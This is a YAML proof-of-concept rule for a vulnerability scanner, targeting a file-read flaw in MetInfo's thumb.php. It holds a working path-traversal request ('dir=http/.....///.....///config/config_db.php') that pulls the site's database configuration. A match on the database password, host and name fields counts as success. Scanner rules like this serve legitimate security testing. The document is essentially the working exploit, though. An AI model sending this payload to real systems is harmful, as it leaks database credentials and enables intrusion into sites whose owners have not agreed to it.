name: poc-yaml-metinfo-file-read
rules:
  - method: GET
    path: "/include/thumb.php?dir=http/.....///.....///config/config_db.php"
    expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name")
detail:
  author: amos1
  links:
    - https://www.cnblogs.com/-qing-/p/10889467.html